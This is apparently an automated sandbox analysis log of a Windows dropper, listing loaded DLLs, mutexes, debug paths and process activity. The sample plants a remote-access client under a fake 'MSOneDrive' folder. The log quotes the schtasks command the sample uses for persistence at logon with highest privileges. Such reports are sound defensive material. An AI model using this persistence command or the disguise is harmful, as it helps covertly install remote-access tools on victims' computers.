                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: String function: 110596B0 appears 52 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: String function: 1114EE63 appears 91 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: String function: 1115D9F0 appears 74 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: String function: 11026600 appears 92 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: String function: 6C8030A0 appears 39 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: String function: 6C8162C0 appears 68 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: String function: 11059580 appears 572 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: String function: 110AE510 appears 37 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: String function: 11095C10 appears 32 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: String function: 6C805910 appears 60 times
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: String function: 11161E0D appears 40 times
                                Source: wfapigp.dll.3.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                Source: icmp.dll.3.drStatic PE information: No import functions for PE file found
                                Source: winrsmgr.dll.3.drStatic PE information: No import functions for PE file found
                                Source: msvcr100_clr0400.dll.3.drStatic PE information: No import functions for PE file found
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameschtas$ vs SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameicmp.dllj% vs SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedxmasf.dllj% vs SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewcodstub.dllj% vs SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameicmp.dllj% vs SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedxmasf.dllj% vs SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewcodstub.dllj% vs SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: classification engineClassification label: mal80.rans.evad.winEXE@7/34@10/3
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110ED2B0 GetModuleFileNameA,LoadLibraryExA,LoadLibraryExA,GetSystemDirectoryA,LoadLibraryExA,GetLastError,FormatMessageA,LocalFree,_memmove,11_2_110ED2B0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11095790 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,11_2_11095790
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11095820 AdjustTokenPrivileges,CloseHandle,11_2_11095820
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11095790 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,13_2_11095790
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11095820 AdjustTokenPrivileges,CloseHandle,13_2_11095820
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1108F8C0 CoInitialize,CLSIDFromProgID,CoCreateInstance,CoUninitialize,11_2_1108F8C0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110C3930 IsWindow,IsWindowVisible,SetForegroundWindow,FindResourceExA,LoadResource,LockResource,DialogBoxIndirectParamA,DialogBoxParamA,11_2_110C3930
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11119810 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,11_2_11119810
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\sdn1[1].zipJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeMutant created: \Sessions\1\BaseNamedObjects\gh435hg34f34c3b35n45m5ujf1123s
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeReversingLabs: Detection: 68%
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeVirustotal: Detection: 54%
                                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe"
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "MSOneDrive" /tr "C:\Users\user\AppData\Local/MSOneDrive\client32.exe" /RL HIGHEST
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeProcess created: C:\Users\user\AppData\Local\MSOneDrive\client32.exe C:\Users\user\AppData\Local/MSOneDrive\client32.exe
                                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Users\user\AppData\Local\MSOneDrive\client32.exe C:\Users\user\AppData\Local/MSOneDrive\client32.exe
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "MSOneDrive" /tr "C:\Users\user\AppData\Local/MSOneDrive\client32.exe" /RL HIGHESTJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeProcess created: C:\Users\user\AppData\Local\MSOneDrive\client32.exe C:\Users\user\AppData\Local/MSOneDrive\client32.exeJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeFile opened: C:\Users\user\AppData\Local\MSOneDrive\MSVCR100.dllJump to behavior
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: ir41_qcx.pdb source: ir41_qcx.dll.3.dr
                                Source: Binary string: uimanagerbrokerps.pdb source: UIManagerBrokerps.dll.3.dr
                                Source: Binary string: E:\nsmsrc\nsm\1280\1280\ctl32\release_unicode\pcichek.pdb source: client32.exe, 0000000B.00000002.3755622548.000000006CB72000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 0000000D.00000002.1392811349.000000006CB72000.00000002.00000001.01000000.00000009.sdmp, PCICHEK.DLL.3.dr
                                Source: Binary string: ir50_32.pdb source: ir50_32.dll.3.dr
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\client32\Release\PCICL32.pdb source: client32.exe, 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.dr
                                Source: Binary string: stub.pdbGCTL source: dpnhupnp.dll.3.dr, dpnathlp.dll.3.dr, dpnlobby.dll.3.dr
                                Source: Binary string: icmp.pdbGCTL source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, icmp.dll.3.dr
                                Source: Binary string: smalldll.pdbGCTL source: dxmasf.dll.3.dr
                                Source: Binary string: E:\nsmsrc\nsm\1280\1280f12\AudioCapture\Release\AudioCapture.pdb source: AudioCapture.dll.3.dr
                                Source: Binary string: icmp.pdb source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, icmp.dll.3.dr
                                Source: Binary string: winrssrv.pdbGCTL source: winrssrv.dll.3.dr
                                Source: Binary string: wiatrace.pdb source: wiatrace.dll.3.dr
                                Source: Binary string: E:\nsmsrc\nsm\1280\1280\ctl32\release_unicode\pcicapi.pdb source: client32.exe, 0000000B.00000002.3755499542.000000006CB45000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 0000000D.00000002.1392710495.000000006CB45000.00000002.00000001.01000000.0000000A.sdmp, pcicapi.dll.3.dr
                                Source: Binary string: E:\DNA\DNABuilds\DNA450\DNA450F3i1\client32\release_unicode_2015\dnarc.pdb source: client32.exe, 0000000B.00000000.1369497547.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000B.00000002.3742058275.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000D.00000000.1388077049.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000D.00000002.1390661255.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, client32.exe.3.dr
                                Source: Binary string: smalldll.pdb source: dxmasf.dll.3.dr
                                Source: Binary string: E:\nsmsrc\NSN\300\CVA_300F1\Ctl32\release\htctl32.pdb source: client32.exe, 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.3.dr
                                Source: Binary string: winrssrv.pdb source: winrssrv.dll.3.dr
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 0000000B.00000002.3755290602.000000006CA71000.00000020.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.1392381174.000000006CA71000.00000020.00000001.01000000.0000000B.sdmp, msvcr100.dll.3.dr
                                Source: Binary string: ir50_32.pdbGCTL source: ir50_32.dll.3.dr
                                Source: Binary string: uimanagerbrokerps.pdbGCTL source: UIManagerBrokerps.dll.3.dr
                                Source: Binary string: wiatrace.pdbUGP source: wiatrace.dll.3.dr
                                Source: Binary string: WFAPIGP.pdb source: wfapigp.dll.3.dr
                                Source: Binary string: WerEnc.pdb source: WerEnc.dll.3.dr
                                Source: Binary string: stub.pdb source: dpnhupnp.dll.3.dr, dpnathlp.dll.3.dr, dpnlobby.dll.3.dr
                                Source: Binary string: GetUName.pdbGCTL source: getuname.dll.3.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.3.dr
                                Source: Binary string: WFAPIGP.pdbUGP source: wfapigp.dll.3.dr
                                Source: Binary string: GetUName.pdb source: getuname.dll.3.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.3.dr
                                Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdb source: msvcp140_codecvt_ids.dll.3.dr
                                Source: Binary string: WerEnc.pdbGCTL source: WerEnc.dll.3.dr
                                Source: Binary string: ir41_qcx.pdbGCTL source: ir41_qcx.dll.3.dr
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: UIManagerBrokerps.dll.3.drStatic PE information: 0xF03077F1 [Wed Sep 11 03:24:33 2097 UTC]
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11081000 LoadLibraryA,LoadLibraryA,GetModuleFileNameA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_11081000
